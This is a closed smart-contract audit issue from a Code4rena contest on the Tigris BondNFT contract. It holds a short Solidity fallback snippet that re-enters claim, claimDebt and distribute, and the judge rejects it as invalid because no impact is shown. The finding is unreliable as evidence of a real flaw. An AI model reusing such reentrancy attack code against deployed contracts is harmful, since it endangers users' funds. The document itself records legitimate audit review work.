Closed code423n4 closed 1 year ago
https://github.com/gbadebosmith/ouch/blob/a77e6c2e74a3d18f879ab97fbf1ed31cd4180b65/AttackBondNFT.sol#L192-L207
Reentrancy attack that uses fallback to call the functions named claim, claimDebt, and distribute via attack file.
sourcecode: https://github.com/code-423n4/2022-12-tigris/blob/main/contracts/BondNFT.sol victim sourcecode: https://github.com/gbadebosmith/ouch/blob/main/BondNFT.sol attack code: https://github.com/gbadebosmith/ouch/blob/main/AttackBondNFT.sol
fallback() external payable { if (1==1) { bondnftfx.claim( 2345678901, 0xc59dFC955c26493c3E5Ac068A308CB787CCE34e6 ); bondnftfx.claimDebt( _owner, 0xc59dFC955c26493c3E5Ac068A308CB787CCE34e6 ); bondnftfx.distribute( 0xc59dFC955c26493c3E5Ac068A308CB787CCE34e6, 33 ); } }
Remix IDE
Unclear what the impact is, you've reentered what did you get?
GalloDaSballo marked the issue as unsatisfactory: Invalid
Closing as dup by same warden (but confusing content)
Please write more
Lines of code
https://github.com/gbadebosmith/ouch/blob/a77e6c2e74a3d18f879ab97fbf1ed31cd4180b65/AttackBondNFT.sol#L192-L207
Vulnerability details
Impact
Reentrancy attack that uses fallback to call the functions named claim, claimDebt, and distribute via attack file.
Proof of Concept
sourcecode: https://github.com/code-423n4/2022-12-tigris/blob/main/contracts/BondNFT.sol victim sourcecode: https://github.com/gbadebosmith/ouch/blob/main/BondNFT.sol attack code: https://github.com/gbadebosmith/ouch/blob/main/AttackBondNFT.sol
Tools Used
Remix IDE
Recommended Mitigation Steps